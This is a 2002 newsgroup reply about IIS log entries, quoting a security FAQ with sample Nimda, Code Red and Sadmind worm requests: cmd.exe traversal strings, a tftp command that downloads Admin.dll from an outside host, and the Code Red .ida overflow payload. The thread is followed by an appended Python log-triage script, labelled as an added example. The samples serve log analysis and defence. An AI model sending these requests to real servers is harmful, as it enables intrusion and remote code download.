Re: Strange Log File Entries

From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 11/05/02


From: "Karl Levinson [x y] mvp" <levinson_k@excite.com>
Date: Mon, 4 Nov 2002 22:05:43 -0500


"Jaffa" <jaffa@cakes.com> wrote in message
news:OU6Yx9GhCHA.2508@tkmsftngp08...
> Can anyone explain these entries in my log file? Is it a virus attack? I
> have no idea where they came from and why they are trying to access
> cmd.exe.
> I have Win2k SP3 installed, and all the other critical updates. X.X.X.X is
> the IP address of my IIS server.
>
> 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> /winnt/system32/cmd.exe 404 3 144 124 0 - - -
> 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> /winnt/system32/cmd.exe 404 3 144 91 0 - - -
> 2002-11-04 21:15:32 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - -

Yes, looks like an old worm. The codes 404 and 500 show that this was
probably not successful.

Note that not only do you need the latest updates, but you also need to have
your web server configured correctly, per the Windows 2000 and IIS hardening
checklists at www.microsoft.com/technet/security, www.nsa.gov,
http://rr.sans.org, etc. It also sounds like you have not installed
IIS Lockdown, which includes URLScan, a very helpful tool in blocking this
stuff.

Read below for more info on reading your IIS logs:

================

These are signs of well-known worms [the Code Red and/or Nimda worm] that
spread from infected server to server. Probably every web server on the
Internet has received and will continue to receive these "attacks," perhaps
several times a day, whether or not the servers are vulnerable to the worm,
even if firewalls and/or antivirus are being used.

The IP address that is sending the requests to your server is likely another
infected web server and not necessarily a hacker.

If you are seeing the log entries in the URLSCAN.LOG file, then URLScan has
successfully blocked that worm attack. [However, the existence of URLScan
does not necessarily prove that a computer is free of all viruses and worms;
for example, a computer that was infected with a worm before URLScan was
installed could still be infected.]

The best way to tell whether your server has been infected is to install and
use an antivirus program.

It is not necessarily always accurate to deduce from the 200, 404 and 500 /
502 codes in a web server log whether or not the server has been infected.
For more information on this, see the section in this FAQ entitled "I found
a code 200 [or 502] in my IIS logs, does that mean my web server has been
successfully hacked?"

For more information on these worm attacks, visit the web site of your
favorite antivirus vendor and/or visit the links below:

www.cert.org
www.cve.mitre.org/cve
www.nipc.gov
www.eeye.com
www.microsoft.com/technet/security

Below are samples of what an IIS web server log would look like when
attacked by a worm such as Nimda, Code Red and/or Sadmind / IIS worms:

NIMDA LOOKS LIKE THIS =======================

[Note that the system is likely compromised if you see a code 200 in the
line where the "tftp.exe" command is used to download the file "Admin.dll,"
as in the last line below. Note however that the lines below containing the
"copy" and "echo" commands were also successful, despite the 502 code which
usually indicates failure.]

GET /scripts/root.exe?/c+dir 200 -
GET /MSADC/root.exe?/c+dir 200 -
GET /c/winnt/system32/cmd.exe?/c+dir 200 -
GET /d/winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 200 -

GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
GET /scripts/root.exe /c+echo+.././index.asp 502 -

GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 -

CODE RED LOOKS LIKE THIS: =======================

[Note that a code 200 after the "GET /default.ida?" line in a Code Red
attack does not necessarily indicate success or failure. It means that the
.ida mapping has not been removed from the IIS server, and it probably
should be.]

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

CODE RED II LOOKS LIKE THIS: ======================

[Note that a code 200 after the "GET /default.ida?" line in a Code Red
attack does not necessarily indicate success or failure. It means that the
.ida mapping has not been removed from the IIS server, and it probably
should be.]

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

SADMIND / IIS WORM LOOKS LIKE THIS: ===============

[Note that this is what the log looks like on a successfully compromised
system - the code 502 after the "copy" and "echo" commands does not indicate
failure here, the commands were successful despite the 502.]

GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
GET /scripts/root.exe /c+echo+.././index.asp 502 -

[Thanks to "Gurn" and others]
________________________________________________________

(11.19) I found a code 200 [or 502] in my IIS logs, does that mean my web
server has been successfully hacked?

A: Not necessarily. Because of this uncertainty, the best way to tell
whether your server has been infected is to install and use an antivirus
program.

A code 502 in an IIS web server log normally indicates that the request was
unsuccessful. However, in some cases, the code 502 does not indicate failure
[for example the code 502 after the "copy" and "echo" commands used by the
Sadmind / IIS Worm and Nimda].

Similarly, a code 200 after a line in an IIS web server log indicates that
the request was successful. However, read the post below by Paul Lynch
regarding a 200 code after a "GET /default.ida" request [as with the Code
Red worm]:

"...a lot of confusion surrounds the 200 return code in response to the GET
/default.ida request.

In a nutshell what this means is that if you haven't removed the .ida
mapping IIS processes the request successfully and returns a 200 to the
browser.

What it *doesn't* mean is that the worm has successfully penetrated your
machine. A patched Index Service will still return a 200 to a browser if
the .ida mapping is present."

A code 404 in the logs so far still appears to indicate an unsuccessful
request [or attack], due to the attacker or worm requesting a file that does
not exist on the server.

Again, because of this uncertainty, the best way to tell whether your server
has been infected is to install and use an antivirus program.

[Thanks to Paul Lynch]
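As an added defender-side example (not code from the original post or from the FAQ it quotes), here is a small Python triage script that parses IIS W3C extended log lines like the ones quoted in this thread and applies the status-code rules the FAQ gives: 404 and 500 on cmd.exe requests are treated as failed probes, a 200 on a tftp download of Admin.dll is flagged as a likely compromise, a 502 after a copy or echo command is not treated as failure, and a 200 on /default.ida is reported as inconclusive. It also counts probes per source address, since the FAQ notes the sender is usually just another infected server. The log lines and IP addresses are constructed samples, and the column layout, including a separate cs-uri-query column, is an assumption taken from the #Fields: header in the sample rather than anything the thread states; the parser reads whatever layout the header declares.

```python
"""Triage of IIS W3C extended log lines for the worm traces discussed above."""
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote, unquote_plus

# Constructed sample, not real log data. IIS W3C logs declare their columns in
# a #Fields: line; this layout (with a separate cs-uri-query column) is an
# assumption, and parse_w3c() uses whatever the header actually declares.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username s-sitename s-ip cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken
2002-11-04 21:15:28 80.130.13.155 - W3SVC1 10.0.0.5 HEAD /winnt/system32/cmd.exe - 404 3 144 124 0
2002-11-04 21:15:32 80.130.13.155 - W3SVC1 10.0.0.5 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe - 500 87 0 95 0
2002-11-04 21:16:01 192.0.2.77 - W3SVC1 10.0.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 0 1200 300 15
2002-11-04 21:16:03 192.0.2.77 - W3SVC1 10.0.0.5 GET /scripts/root.exe /c+echo+.././index.asp 502 0 0 300 15
2002-11-04 21:16:05 192.0.2.77 - W3SVC1 10.0.0.5 GET /scripts/..%2f../winnt/system32/cmd.exe /c+tftp%20i%20192.0.2.77%20GET%20Admin.dll%20d:\\Admin.dll 200 0 0 300 15
2002-11-04 21:17:10 198.51.100.9 - W3SVC1 10.0.0.5 GET /default.ida NNNNNNNN%u9090%u6858%ucbd3%u7801 200 0 0 400 20
2002-11-04 21:18:00 203.0.113.4 - W3SVC1 10.0.0.5 GET /index.html - 200 0 5000 200 3
"""


@dataclass
class Finding:
    when: str
    client_ip: str
    family: str
    status: int
    verdict: str


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # header-less or malformed line: skip rather than guess columns
        yield dict(zip(fields, values))


def classify(rec):
    """Map one parsed record to a Finding, or None if nothing worm-like is present."""
    # One round of %-decoding, as IIS does before touching the filesystem. Invalid
    # byte sequences such as the overlong %c0%af slash decode to U+FFFD but leave
    # the surrounding '..' intact, which is all the traversal check relies on.
    stem = unquote(rec.get("cs-uri-stem", "")).lower()
    query = unquote_plus(rec.get("cs-uri-query", "-")).lower()
    status = int(rec.get("sc-status", "0"))
    when = f'{rec.get("date", "")} {rec.get("time", "")}'
    ip = rec.get("c-ip", "?")

    if stem.endswith("/default.ida"):
        # Code Red / Code Red II probe: a 200 only proves the .ida mapping is present.
        return Finding(when, ip, "Code Red (.ida probe)", status,
                       "inconclusive: 200 means the .ida mapping is still present; remove it")

    if stem.endswith(("cmd.exe", "root.exe")):
        family = "Nimda / Sadmind-IIS style (cmd.exe or root.exe)"
        if ".." in stem:
            family += " via traversal"
        command = query[2:].strip() if query.startswith("/c") else query
        if status == 404:
            verdict = "failed: file not found"
        elif status == 500:
            verdict = "probably failed: server error"
        elif status == 200 and "tftp" in command:
            verdict = "LIKELY COMPROMISED: tftp download returned 200"
        elif status == 502 and command.startswith(("copy", "echo")):
            verdict = "command probably ran despite 502 (copy/echo caveat)"
        elif status == 200:
            verdict = "served 200: command shell reachable, investigate the host"
        else:
            verdict = f"status {status}: review manually"
        return Finding(when, ip, family, status, verdict)
    return None


def triage(text):
    """Return the worm-related findings for a whole log, in log order."""
    return [f for f in (classify(r) for r in parse_w3c(text)) if f is not None]


def probes_by_source(findings):
    """Count worm-style requests per client IP; the sender is usually another infected host."""
    return Counter(f.client_ip for f in findings)


def compromise_indicators(findings):
    """Only the findings that the FAQ's rules treat as evidence of compromise."""
    return [f for f in findings if f.verdict.startswith("LIKELY COMPROMISED")]


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f.when} {f.client_ip:15} {f.status} {f.family}: {f.verdict}")
    print("probes per source:", dict(probes_by_source(found)))
```

Point `triage()` at the text of a real W3C log and the same rules apply; anything reported as LIKELY COMPROMISED still needs the antivirus check the FAQ recommends, because, as the FAQ stresses, status codes alone are not proof either way.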
